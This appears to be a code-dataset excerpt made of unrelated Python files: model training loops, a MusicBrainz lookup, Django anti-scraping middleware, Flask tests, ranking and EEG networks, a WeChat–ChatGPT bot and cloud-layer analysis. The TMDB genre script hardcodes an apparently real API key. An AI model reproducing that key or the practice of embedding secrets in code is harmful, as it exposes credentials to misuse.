    TrainDataloader = DataLoader(TrainDataset, batch_size=batch_size, num_workers=4, sampler=TrainDatasampler, drop_last=True)

    # optimizer and loss: poly LR schedule, multi-label BCE objective.
    optimizer = PolyOptimizer(net.parameters(), base_lr, weight_decay=1e-4, max_step=epochs, momentum=0.9)
    criteria = torch.nn.BCEWithLogitsLoss(reduction='mean')
    # NOTE(review): regression_criteria is constructed but unused below.
    regression_criteria = torch.nn.MSELoss(reduction='mean').cuda()
    criteria.cuda()

    # train loop
    loss_t = []   # per-epoch mean training loss
    iou_v = []    # validation mIoU at each evaluation point
    best_val = 0
    for i in range(epochs):
        count = 0
        running_loss = 0.
        net.train()
        for img, label in tqdm(TrainDataloader):
            count += 1
            img = img.cuda()
            label = label.cuda()
            scores = net(img)
            loss = criteria(scores, label.float())
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
        train_loss = running_loss / count
        loss_t.append(train_loss)

        valid_iou = 0
        # Periodic validation (and always on the final epoch).
        if test_every != 0 and ((i + 1) % test_every == 0 or (i + 1) == epochs):
            # Build a CAM-headed copy of the classifier: copy weights (with
            # the 'module.' DataParallel prefix stripped) and turn the
            # classification FC into a 1x1-conv CAM head.
            # net_cam = network.wideResNet_cam()
            net_cam = getattr(importlib.import_module("network.wide_resnet"), 'wideResNet')()
            pretrained = net.state_dict()
            pretrained = {k[7:]: v for k, v in pretrained.items()}
            pretrained['fc_cam.weight'] = pretrained['fc_cls.weight'].unsqueeze(-1).unsqueeze(-1).to(torch.float64)
            pretrained['fc_cam.bias'] = pretrained['fc_cls.bias']
            # del pretrained['fc_cls.weight']
            # del pretrained['fc_cls.bias']
            net_cam.load_state_dict(pretrained)
            net_cam = torch.nn.DataParallel(net_cam, device_ids=devices).cuda()

            # calculate MIOU over the pre-cropped validation set
            valid_image_path = os.path.join(validation_folder_name, model_name)
            generate_validation_cam(net_cam, config, batch_size, validation_dataset_path, validation_folder_name, model_name)
            valid_iou = get_overall_valid_score(valid_image_path, validation_mask_path, num_workers=8)
            iou_v.append(valid_iou)

            # Checkpoint whenever validation mIoU improves.
            if valid_iou > best_val:
                print("Updating the best model..........................................")
                best_val = valid_iou
                torch.save({"model": net.state_dict(), 'optimizer': optimizer.state_dict()}, "./classification/weights/" + model_name + "_best.pth")

        print(f'Epoch [{i+1}/{epochs}], Train Loss: {train_loss:.4f}, Valid mIOU: {valid_iou:.4f}, Valid Dice: {2 * valid_iou / (1 + valid_iou):.4f}')

    # Always keep the final-epoch weights alongside the best checkpoint.
    torch.save({"model": net.state_dict(), 'optimizer': optimizer.state_dict()}, "./classification/weights/" + model_name + "_last.pth")

    # ---- training curves --------------------------------------------------
    plt.figure(1)
    plt.plot(loss_t)
    plt.ylabel('loss')
    plt.xlabel('epochs')
    plt.title('train loss')
    plt.savefig('./classification/result/train_loss.png')
    plt.close()

    plt.figure(2)
    plt.plot(list(range(test_every, epochs + 1, test_every)), iou_v)
    plt.ylabel('mIoU')
    plt.xlabel('epochs')
    plt.title('valid mIoU')
    plt.savefig('./classification/result/valid_iou.png')
| xmed-lab/OEEM | classification/train.py | train.py | py | 6,342 | python | en | code | 29 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "yaml.safe_load",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path",
"... |
11303967232 | import logging
import musicbrainzngs
from retrying import retry
from ..constants import SAMPLE_RATE
logger = logging.getLogger(__name__)
class MusicbrainzLookup(object):
    """Looks up CD metadata on MusicBrainz from a disc id."""

    @retry(stop_max_attempt_number=5, wait_exponential_multiplier=100)
    def query(self, disc_id):
        """Return a disc-meta dict (artist, title, cd position, tracks with
        durations in samples) for *disc_id*, or None when MusicBrainz has no
        usable answer. Retried up to 5 times with exponential backoff.
        """
        logger.debug('Retrieving disc meta online')
        musicbrainzngs.set_useragent('cdp-sa', '0.0.1')
        musicbrainzngs.auth('', '')
        disc_meta = {
            'disc_id': disc_id,
            'tracks': []
        }
        try:
            response = musicbrainzngs.get_releases_by_discid(
                disc_id,
                includes=["artists", "artist-credits", "recordings"]
            )
        except musicbrainzngs.musicbrainz.ResponseError:
            logger.exception('Could not retrieve disc meta from Musicbrainz')
            return None
        # idiom fix: plain "not in" membership tests instead of "not 'k' in d.keys()"
        if 'disc' not in response or 'release-list' not in response['disc']:
            logger.error('Musicbrainz response contains no relevant information')
            return None
        this_release = response['disc']['release-list'][0]
        if self.is_single_artist(this_release['artist-credit']):
            disc_meta['artist'] = this_release['artist-credit-phrase']
        disc_meta['title'] = this_release['title']
        # count only CD media (a release may also bundle DVDs etc.)
        disc_meta['total_cds'] = len(list(
            filter(
                lambda medium: medium['format'] == 'CD',
                this_release['medium-list']
            )
        ))
        # find the medium that carries our disc id and copy its track list
        for medium in this_release['medium-list']:
            for disc in medium['disc-list']:
                if disc['id'] == disc_id:
                    disc_meta['cd'] = int(medium['position'])
                    tracks = medium['track-list']
                    for track in tracks:
                        artist = track['recording']['artist-credit'][0]['artist']['name']
                        disc_meta['tracks'].append({
                            'artist': artist,
                            'title': track['recording']['title'],
                            # MusicBrainz length is in ms: ms -> whole seconds -> samples
                            'duration': (int(track['length']) // 1000) * SAMPLE_RATE
                        })
                    break
        if not disc_meta['tracks']:
            logger.error('Musicbrainz response has no information about the tracks')
            return None
        disc_meta['duration'] = sum(track['duration'] for track in disc_meta['tracks'])
        return disc_meta

    def is_single_artist(self, artist_credit):
        """True when the release credits exactly one Group/Person artist."""
        return len(artist_credit) == 1 and artist_credit[0]['artist']['type'] in ['Group', 'Person']
| pisarenko-net/cdp-sa | hifi_appliance/meta/musicbrainz.py | musicbrainz.py | py | 2,585 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "musicbrainzngs.set_useragent",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "musicbrainzngs.auth",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "mus... |
70521690663 | import time
from django.core import cache
from django.http import HttpResponse
from django.utils.deprecation import MiddlewareMixin
from xiaochengxu import settings
class CountipMiddle(MiddlewareMixin):
    """Anti-scraping middleware: rejects IPs in settings.BLOCKED_IPS and
    auto-blacklists clients that issue two requests less than 0.5 s apart."""

    # runs before the view is called
    def process_request(self, request):
        # client IP: first hop of X-Forwarded-For when behind a proxy / load balancer
        x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
        if x_forwarded_for:
            ip = x_forwarded_for.split(',')[0]  # real client IP behind the proxy
        else:
            ip = request.META.get('REMOTE_ADDR')  # direct connection (or proxy) IP
        black_ips = getattr(settings, 'BLOCKED_IPS')
        if ip in black_ips:
            return HttpResponse('404')
        loadtime = cache.cache.get(ip)
        now = time.time()
        if loadtime:
            cache.cache.set(ip, now)
            if now - loadtime < 0.5:
                # two requests within 0.5 s: permanently blacklist this IP
                black_ips.append(ip)
                setattr(settings, 'BLOCKED_IPS', black_ips)
                return HttpResponse('404')
        else:
            # bug fix: the original stored the constant 1 here instead of the
            # request timestamp, so "now - loadtime" on the next hit was always
            # huge and rapid-fire requests from a fresh IP were never detected.
            cache.cache.set(ip, now, 10)
| zhoujialefanjiayuan/liu-lian | xiaochengxu/middleware/fanpa.py | fanpa.py | py | 1,113 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.utils.deprecation.MiddlewareMixin",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "xiaochengxu.settings",
"line_number": 19,
"usage_type": "argument"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 21,
"usage_type": "call"
},... |
28856693359 | import yaml
import json
from typing import Sequence
from types import SimpleNamespace
from itertools import combinations, permutations
from sympy import symbols, Symbol
from sympy.logic.boolalg import BooleanFunction, And, Or, Not
import numpy as np
import torch
from torch import nn, Tensor
from dataset import collate_adjacencies
from models import MultiLayerPerceptron, activations
from utilities import combinations_2, sympy_to_weighted_adjacency, ndarray_to_tuples
class DirectRanker(nn.Module):
    """Pairwise ranking network: a shared encoder MLP applied to both items of
    a pair, followed by a bias-free linear head scoring the encoded difference."""

    def __init__(self, config: SimpleNamespace, in_dim=None):
        super().__init__()
        cfg = config.rank_model
        input_dim = cfg.input_dim if in_dim is None else in_dim
        act = activations(config, cfg.mlp_activation)
        # shared feature encoder applied to each element of the pair
        self.enc_ffnn = MultiLayerPerceptron(
            layer_dims=[input_dim] + [cfg.hidden_dim] * cfg.mlp_layers,
            layer_activations=[act] * cfg.mlp_layers,
            p_dropout=cfg.p_dropout,
            xavier_init=cfg.xavier_init,
        )
        # bias-free linear scorer (antisymmetry of the pair score needs bias=False)
        self.out_ffnn = MultiLayerPerceptron(
            layer_dims=[cfg.hidden_dim, 1],
            layer_activations=[nn.Identity()],
            p_dropout=cfg.p_dropout,
            bias=False,
            xavier_init=cfg.xavier_init,
        )

    def forward(self, x: Tensor):
        """x has shape (..., 2, D); returns (pair score, score of item 1, score of item 2)."""
        assert x.shape[-2] == 2
        enc_first = self.enc_ffnn(x[..., 0, :])
        enc_second = self.enc_ffnn(x[..., 1, :])
        return (
            self.out_ffnn(enc_first - enc_second),
            self.out_ffnn(enc_first),
            self.out_ffnn(enc_second),
        )
class MaxSATRanker(nn.Module):
    """Ranks items by combining a learned pairwise ranker with a differentiable
    MaxSAT solver that enforces transitivity among the pairwise decisions."""

    def __init__(self, config: SimpleNamespace, pair_ranker: nn.Module, maxsat_solver: nn.Module) -> None:
        super().__init__()
        self.config = config
        self.pair_ranker = pair_ranker
        self.maxsat_solver = maxsat_solver
        self.device = torch.device("cuda" if config.training.use_cuda and torch.cuda.is_available() else "cpu")

    def forward(self, features):
        # features: (B, N, D) -- B samples, N items, D-dim features per item
        B, N, D = features.shape
        pairwise_indices = combinations_2(np.arange(N), batched=False) # (NC2, 2)
        # one boolean variable per unordered item pair: v1 .. v_{NC2}
        variables = symbols("v1:{}".format(len(pairwise_indices)+1))
        pair2idx = {pair : idx for idx, pair in enumerate(ndarray_to_tuples(pairwise_indices))}
        pairwise_features = combinations_2(features) # (B, NC2, 2, D)
        ranker_predictions = self.pair_ranker(pairwise_features).squeeze() # (B, NC2, 2, D) -> (B, NC2, 1) -> (B, NC2)
        # one CNF per sample encoding transitivity over the pair variables
        formulas = self.create_cnfs(B, N, ranker_predictions, pair2idx, variables)
        # sigmoid of the raw pair scores = soft truth value per variable
        variable_probabilities = torch.sigmoid(ranker_predictions) # (B, NC2)
        adj_matrices = [sympy_to_weighted_adjacency(cnf, weights, device=self.device) for cnf, weights in zip(formulas, variable_probabilities)]
        # NOTE(review): batch_counts computed here is overwritten by collate_adjacencies below -- confirm intended
        batch_counts = torch.tensor([N] * B, device=self.device)
        adj_matrices, batch_counts, formulas, _ = collate_adjacencies(zip(adj_matrices, formulas, [0] * B))
        maxsat_assignments = self.maxsat_solver(adj_matrices, batch_counts).squeeze() # (B, NC2 * 2, C) -> (B, NC2, 1) -> (B, NC2)
        return ranker_predictions, maxsat_assignments, formulas

    def create_cnfs(self, batches: int, n_docs: int, pair_predictions: Tensor, pair2idx: dict, variables: Sequence[Symbol]):
        """Build one CNF per sample: for every item triple (x, y, z) whose pairwise
        score signs agree, add the transitivity clause (v_xy AND v_yz) -> v_xz,
        written as (NOT v_xy OR NOT v_yz OR v_xz)."""
        B, N = batches, n_docs
        cnfs = []
        for sample in range(B):
            clauses = []
            for i, (x, y, z) in enumerate(combinations(np.arange(N), 3)):
                sign_xy = torch.sign(pair_predictions[sample, pair2idx[(x, y)]])
                sign_yz = torch.sign(pair_predictions[sample, pair2idx[(y, z)]])
                if sign_xy == sign_yz:
                    clauses.append(Or(
                        Not(variables[pair2idx[(x, y)]]),
                        Not(variables[pair2idx[(y, z)]]),
                        variables[pair2idx[(x,z)]]
                    ))
            cnfs.append(And(*clauses))
        return cnfs
if __name__ == "__main__":
    # Smoke test: load the YAML config, wrap nested dicts as attribute-style
    # namespaces, and instantiate the pairwise ranker.
    with open("configurations/config_rank_sat.yaml") as yaml_reader:
        config = yaml.safe_load(yaml_reader)
    # round-trip through JSON to convert every nested dict into a SimpleNamespace
    config = json.loads(json.dumps(config), object_hook=lambda d : SimpleNamespace(**d))
    print(config)
    model = DirectRanker(config)
    print(model)
{
"api_name": "torch.nn.Module",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "types.SimpleNamespace",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "models.activation... |
23585423225 | """
EEGNet
edit by hichens
"""
import numpy as np
from sklearn.metrics import roc_auc_score, precision_score, recall_score, accuracy_score
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.optim as optim
import sys; sys.path.append("..")
from utils.options import opt
class SeparableConv2d(nn.Module):
    """Depthwise-separable 2-D convolution: a per-channel (depthwise) conv
    followed by a 1x1 pointwise conv that mixes channels."""

    def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False):
        super(SeparableConv2d, self).__init__()
        # depthwise stage: one filter per input channel (groups == in_channels)
        self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size, stride,
                               padding, dilation, groups=in_channels, bias=bias)
        # pointwise stage: 1x1 convolution across channels
        self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)

    def forward(self, x):
        return self.pointwise(self.conv1(x))
class EEGNet(nn.Module):
    """EEGNet-style CNN classifier for EEG epochs: temporal conv, depthwise
    spatial conv across channels, separable conv, then an MLP head."""

    def __init__(self, opt):
        super(EEGNet, self).__init__()
        # F: filters per block; D: depth multiplier; C: number of EEG channels.
        # NOTE: this local F shadows the torch.nn.functional alias inside __init__ only.
        F = [8, 16]
        T = 101  # unused here
        D = 2
        C = opt.num_channel
        # Layer 1: temporal convolution over the time axis
        self.conv1 = nn.Conv2d(in_channels=1, out_channels=F[0], kernel_size=(1, 64), padding=(0, 32))
        self.batchnorm1 = nn.BatchNorm2d(F[0], False)
        self.pooling1 = nn.MaxPool2d(kernel_size=(1, 4))
        # Layer 2: depthwise spatial convolution collapsing the channel axis
        self.conv2 = nn.Conv2d(in_channels=F[0], out_channels=D*F[0], kernel_size=(C, 1), groups=F[0])
        self.batchnorm2 = nn.BatchNorm2d(D*F[0], False)
        self.pooling2 = nn.MaxPool2d(kernel_size=(1, 8))
        # Layer 3: separable convolution
        self.padding2 = nn.ZeroPad2d((2, 1, 4, 3))
        self.conv3 = SeparableConv2d(in_channels=D*F[0], out_channels=F[1], kernel_size=(1, 16), padding=(0, 8))
        self.batchnorm3 = nn.BatchNorm2d(F[1], False)
        self.pooling3 = nn.MaxPool2d((1, 16))
        # I have 120 timepoints.
        self.flatten = nn.Flatten()
        # probe forward pass with a dummy batch to infer the flattened size
        size = self.get_size()
        self.fc = nn.Sequential(
            nn.Flatten(),
            nn.Linear(size[1], opt.hidden_size),
            nn.Dropout(opt.dropout_rate),
            nn.ELU(),
            nn.Linear(opt.hidden_size, opt.num_class),
            nn.ReLU()
        )

    def get_feature(self, x):
        # NOTE(review): this reads the module-level `opt`, not the one passed to
        # __init__ -- confirm they are always the same object.
        # Layer 1
        x = F.elu(self.conv1(x)) # batch_size x 16 x 40 x 101
        x = self.batchnorm1(x)
        if not opt.small:
            x = self.pooling1(x)
        x = F.dropout(x, opt.dropout_rate)
        # Layer 2
        x = self.conv2(x) # batch_size x 16 x 1 x 102
        x = F.elu(self.batchnorm2(x))
        if not opt.small:
            x = self.pooling2(x)
        x = F.dropout(x, opt.dropout_rate)
        # Layer 3
        x = self.conv3(x)
        x = F.elu(self.batchnorm3(x))
        if not opt.small:
            x = self.pooling3(x)
        x = F.dropout(x, opt.dropout_rate)
        return x

    def forward(self, x):
        # FC Layer
        x = self.get_feature(x)
        # print(x.shape)
        # sys.exit(0)
        x = torch.sigmoid(self.fc(x))
        return x

    def get_size(self):
        # dry run with a random dummy batch to measure the flattened feature length
        x = torch.rand(2, 1, opt.num_channel, opt.num_dim)
        x = self.get_feature(x)
        x = self.flatten(x)
        return x.size()
if __name__ == "__main__":
    # smoke test: push one random batch through the network
    from utils.options import opt
    net = EEGNet(opt)
    x = torch.rand(2, 1, opt.num_channel, opt.num_dim) # 1 x 1 x 120 x 64
    print(net(x))
{
"api_name": "sys.path.append",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"li... |
69815063464 | import requests
import json
TMDB_API_KEY ='2ee130f2ba9bf221b6fe5107cffcac46'
def get_movie_genre():
    """Fetch the TMDB movie-genre list and append Django-fixture-shaped
    records to the module-level ``genre_list``."""
    request_url = f"https://api.themoviedb.org/3/genre/movie/list?api_key={TMDB_API_KEY}&language=en"
    genres = requests.get(request_url).json()
    for genre in genres['genres']:
        fields = {
            'name': genre['name'],
        }
        data = {
            "model": "tmdb.genre",  # Django app.model label used by loaddata
            "pk": genre['id'],
            "fields": fields
        }
        genre_list.append(data)

# accumulator filled by get_movie_genre() with fixture records
genre_list = []
get_movie_genre()

file_path = "./genres.json"
# write as a Django fixture; ensure_ascii=False keeps non-ASCII genre names readable
with open(file_path, 'w', encoding='UTF-8') as outfile:
    json.dump(genre_list, outfile, indent="\t", ensure_ascii=False)
{
"api_name": "requests.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 40,
"usage_type": "call"
}
] |
73335280743 | # coding: utf-8
"""
Test webservices
"""
import sys
import os
PROJECT_HOME = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../../../'))
sys.path.append(PROJECT_HOME)
import json
import unittest
from flask import url_for
from flask_testing import TestCase
from httmock import urlmatch, HTTMock
from tugboat.app import create_app
@urlmatch(netloc=r'fakeapi\.query$')
def store_200(url, request):
    """Mocked vault/query endpoint: successful (200) response with a stored query id."""
    payload = {'qid': 'adsf1234', 'query': 'q', 'numfound': 1}
    return {'status_code': 200, 'content': payload}
@urlmatch(netloc=r'fakeapi\.query$')
def vault_500(url, request):
    """Mocked vault/query endpoint: internal server error (500)."""
    error_response = {'status_code': 500, 'content': 'ERROR'}
    return error_response
class TestBumblebeeView(TestCase):
    """
    A basic base class for all of the tests here
    """
    def create_app(self):
        """
        Create the wsgi application
        """
        app_ = create_app()
        # point the app at the mocked vault endpoint (matched by @urlmatch above)
        app_.config['VAULT_QUERY_URL'] = 'http://fakeapi.query'
        app_.config['BUMBLEBEE_URL'] = 'http://devui.adsabs.harvard.edu/'
        self.bumblebee_url = app_.config['BUMBLEBEE_URL']
        return app_

    def test_get_redirect_with_qid(self):
        """
        Tests that when you send a list of bibcodes, you get a queryid URL and
        a redirect status code
        """
        url = url_for('bumblebeeview')
        bibcodes = ['bib1', 'bib2', 'bib3', 'bib4']
        with HTTMock(store_200):
            r = self.client.post(url, data=json.dumps(bibcodes))
        self.assertStatus(r, 200)
        # redirect URL must embed the query id returned by the mocked vault service
        self.assertEqual(
            r.json['redirect'],
            self.bumblebee_url + 'search/q=*%3A*&__qid=adsf1234'
        )

    def test_when_send_empty_or_no_bibcodes(self):
        """
        Just a simple test to check someone actually sends something
        """
        url = url_for('bumblebeeview')
        # payload is not a JSON list of bibcodes -> bad request
        r = self.client.post(url, data={'fake': 'data'})
        self.assertStatus(r, 400)

    def test_when_vault_query_sends_non_200(self):
        """
        When vault/query returns a non-200 status code
        """
        url = url_for('bumblebeeview')
        bibcodes = ['bib1', 'bib2', 'bib3', 'bib4']
        with HTTMock(vault_500):
            r = self.client.post(url, data=json.dumps(bibcodes))
        # upstream failure is propagated as a 500
        self.assertStatus(r, 500)
# run the suite directly with verbose output
if __name__ == '__main__':
    unittest.main(verbosity=2)
| adsabs/tugboat | tugboat/tests/tests_unit/test_webservices.py | test_webservices.py | py | 2,331 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9... |
22397199213 | import os
from datetime import datetime
from celery import Celery
from celery.schedules import crontab
from celery.utils.log import get_task_logger
# Run with two terminals:
#   1st terminal: celery -A MainWater beat
#   2nd terminal: celery -A MainWater worker --loglevel=info
logger = get_task_logger(__name__)
# Set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MainWater.settings')
app = Celery('MainWater', broker="redis://localhost:7777")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django apps.
app.conf.timezone = 'UTC'
#@app.on_after_configure.connect
#def setup_periodic_tasks(sender, **kwargs):
# Calls test('hello') every 10 seconds.
# sender.add_periodic_task(10.0, get_data_from_clever_counters.s('hello'), name='add every 10')
# NOTE(review): despite the schedule key's name, this runs the "get_data"
# task every 60 seconds around the clock -- confirm the intended cadence.
app.conf.beat_schedule = {
    "every day between 6 AM & 18 PM": {
        "task": "get_data", # <---- Name of task
        "schedule": 60.0
    },
}
app.autodiscover_tasks()
@app.task
def test(arg):
    """Debug task that simply echoes its argument to stdout."""
    print(arg)
@app.task
def get_data_from_clever_counters(args, **kwargs):
    """Scheduled task stub: prints today's day-of-month and month
    (the actual counter fetch is not implemented yet)."""
    day_of_month = datetime.today().day
    month = datetime.today().month
    print(day_of_month, month)
| dillag/countersAPI | MainWater/MainWater/celery.py | celery.py | py | 1,497 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "celery.utils.log.get_task_logger",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.environ.setdefault",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name":... |
28639327912 | #-*- coding: GBK-*-
import time
from wxauto import *
import openai
import os
# local proxy ports used to reach the OpenAI API
os.environ['HTTP_PROXY'] = 'http://127.0.0.1:7890'
os.environ['HTTPS_PROXY'] = 'http://127.0.0.1:7890'
# API key from https://platform.openai.com/overview
openai.api_key="your_key"
def chatretern(prompt, moudel_engine="gpt-3.5-turbo"):
    """Send *prompt* to the OpenAI chat-completion API and return the raw completion."""
    messages = [{"role": "user", "content": prompt}]
    return openai.ChatCompletion.create(model=moudel_engine, messages=messages)
if __name__ == '__main__':
    who = '文件传输助手' # chat target: contact or WeChat group name
    nickname = 'chatgpt' # keyword that triggers a chatgpt reply
    speakList = ['帆'] # senders allowed to trigger replies
    wx = WeChat()
    wx.ChatWith(who)
    print("开始监控win微信程序")
    while True:
        # poll the last message roughly once per second
        msgobject1 = wx.GetLastMessage
        speaker1, msgcontent, speakerid1 = msgobject1
        time.sleep(1)
        # if the message contains the chatgpt nickname and the sender is allowed:
        if nickname in msgcontent and speaker1 in speakList:
            wx.SendMsg('已收到 %s 的问题:' % (speaker1) + msgcontent[7:])
            print("已收到",'%s' % (speaker1),"的问题")
            sccess = False
            # NOTE(review): bare except retries forever on any error (including
            # non-transient ones such as a bad API key) -- consider narrowing.
            while not sccess:
                try:
                    # strip the leading "@chatgpt " prefix (first 7 chars) before sending
                    ai_response = chatretern(msgcontent[7:])
                    returnMessage="sumtoken:"+str(ai_response.usage.total_tokens)+" "+ai_response.choices[0].message['content']
                    sccess = True
                except:
                    wx.SendMsg('error! retrying...')
                    time.sleep(1)
            wx.SendMsg('@%s' % (speaker1) + returnMessage)
            print("已回复",'%s' % (speaker1),"的问题")
            continue
| sfs999/win_chatgpt | chatwx.py | chatwx.py | py | 1,735 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "openai.api_key",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "openai.ChatCompleti... |
34682614662 | import numpy as np
import matplotlib
import scipy
import netCDF4 as nc4
import numpy.ma as ma
import matplotlib.pyplot as plt
from netCDF4 import Dataset
import struct
import glob
import pandas as pd
from numpy import convolve
import datetime
import atmos
import matplotlib.dates as mdates
#"""
#Created on Wed Nov 13 10:41:35 2019
#functions to define,for each day of the dataset, which is the interval of time
#to consider to select typical boundary layer clouds and exclude other cloud types
#which can mess up the statistics. the filter is based on human selection based
#on visual inspection of cloudnet target classification and model cloud mask.
#As general rule: we exclude all clouds with cloud base above 2000 mt and vertical
#extension larger than 1000 m associated with a mixed / ice phase.
#'20130501']#'20130502']#, '20130501','20130424', '20130425', '20130427', '20130429'
#@author: cacquist
#"""
import xarray as xr
def f_selectingPBLcloudWindow(date):
    """ Return the processing time window and PBL-height threshold for a day.

    Each campaign day gets a human-selected maximum cloud-top height (from
    visual inspection of cloudnet target classification / model cloud mask)
    used to separate boundary-layer clouds from other cloud types. Every
    selected day uses the same 06:00-23:59:59 window.

    Parameters
    ----------
    date : str
        Day in 'YYYYMMDD' form.

    Returns
    -------
    dict with keys 'timeStart', 'timeEnd' (datetime.datetime) and
    'heightPBL' (float, metres).

    Raises
    ------
    ValueError if the date is not in the campaign table (the original
    if-chain crashed with UnboundLocalError for unknown dates).
    """
    # human-selected PBL height threshold [m] per campaign day
    PBL_HEIGHTS = {
        '20130414': 2500., '20130420': 2000., '20130424': 2000.,
        '20130425': 5000., '20130426': 5000., '20130427': 3000.,
        '20130428': 3500., '20130429': 3000., '20130430': 3000.,
        '20130501': 2500., '20130502': 4000., '20130503': 3000.,
        '20130504': 2500., '20130505': 2500., '20130506': 3000.,
        '20130509': 3000., '20130510': 3000., '20130518': 2500.,
        '20130524': 4500., '20130525': 3000., '20130527': 3000.,
        '20130528': 4000.,
    }
    if date not in PBL_HEIGHTS:
        raise ValueError('no PBL cloud window defined for date %s' % date)
    yy = int(date[0:4])
    mm = int(date[4:6])
    dd = int(date[6:8])
    # every selected day shares the same 06:00 - 23:59:59 window
    timeStart = datetime.datetime(yy, mm, dd, 6, 0, 0)
    timeEnd = datetime.datetime(yy, mm, dd, 23, 59, 59)
    dictOut = {'timeStart': timeStart, 'timeEnd': timeEnd,
               'heightPBL': PBL_HEIGHTS[date]}
    return(dictOut)
#-------------------------------------------------------------------------------------
def f_calculateCloudBaseTopThickness(cloudMask, time, height, humanInfo):
    """
    date : wednesday 13 may 2020
    author: Claudia Acquistapace
    goal: identify all cloud bases and cloud tops per time step and split
    PBL from non-PBL clouds using human observations for the day.
    input: cloudMask (time x height), time, height,
           humanInfo dict with 'timeStart', 'timeEnd', 'heightPBL'
    output: (clouds, PBLclouds) xarray Datasets with cloudBase, cloudTop,
            cloudThick per (time, levels)
    full_update: the branch handling "no cloud base/top anywhere" indexed the
    output arrays with an undefined loop variable (NameError); the arrays are
    already NaN-filled, so that branch now simply skips the fill loop.
    """
    dimTime = len(time)
    dimHeight = len(height)
    heightPBL = humanInfo['heightPBL']
    timeStart = humanInfo['timeStart']
    timeEnd = humanInfo['timeEnd']

    # STEP 1: identifying all cloud bases and tops
    # ---------------------------------------------------
    # converting cloud mask to 1 / 0 matrix (any non-zero flag counts as cloud)
    BinaryMatrix = np.zeros((dimTime, dimHeight))
    for itime in range(dimTime):
        for iH in range(dimHeight):
            if cloudMask[itime, iH] != 0.:
                BinaryMatrix[itime, iH] = 1

    # height-gradient of the binary mask: -1 marks a base, +1 marks a top
    gradBinary = np.diff(BinaryMatrix, axis=1)

    # counting max number of cloud bases / cloud tops found per profile
    numberCB = []
    numberCT = []
    for itime in range(dimTime):
        column = gradBinary[itime, :]
        numberCB.append(len(np.where(column == -1.)[0][:]))
        numberCT.append(len(np.where(column == 1.)[0][:]))
    NCB = max(numberCB)
    NCT = max(numberCT)

    # output arrays are NaN-filled; profiles with fewer layers keep NaN columns
    CBarray = np.zeros((dimTime, NCB))
    CBarray.fill(np.nan)
    CTarray = np.zeros((dimTime, NCT))
    CTarray.fill(np.nan)
    NlayersArray = np.zeros((dimTime))
    NlayersArray.fill(np.nan)

    # bug fix: when NCB or NCT is zero there is nothing to fill (the original
    # indexed CBarray with an undefined variable here); otherwise store every
    # base/top height found per profile.
    if (NCB != 0) and (NCT != 0):
        for iTime in range(dimTime):
            column = gradBinary[iTime, :]
            indCB = np.where(column == -1.)[0][:]
            NfoundCB = len(indCB)
            indCT = np.where(column == 1.)[0][:]
            NfoundCT = len(indCT)
            CBarray[iTime, 0:NfoundCB] = height[indCB]
            CTarray[iTime, 0:NfoundCT] = height[indCT]
            NlayersArray[iTime] = numberCB[iTime]

    # cloud thickness per layer (NOTE(review): assumes NCB == NCT as in the
    # original; profiles where a layer touches the domain edge may differ)
    cloudThicknessDatabase = CTarray - CBarray
    levels = np.arange(NCB)

    # step 2: build cloud database with all clouds saved as xarray dataset
    clouds = xr.Dataset(
        data_vars = {'cloudBase' : (('time', 'levels'), CBarray),
                     'cloudTop'  : (('time', 'levels'), CTarray),
                     'cloudThick': (('time', 'levels'), cloudThicknessDatabase)},
        coords = {'levels': levels,
                  'time' : time})

    # step 3: PBL clouds = clouds in the human-selected window with top below PBL height
    cloudsTimeWindow = clouds.sel(time=slice(timeStart, timeEnd))
    PBLclouds = cloudsTimeWindow.where(cloudsTimeWindow.cloudTop < heightPBL)
    return(clouds, PBLclouds)
#--------------------------------------------------------------------------
def f_calculateMinCloudBaseTop(clouds, PBLclouds, date_arr):
    """author: claudia Acquistapace
    date: 18/05/2020
    goal: calculate the minimum cloud base and the corresponding cloud top
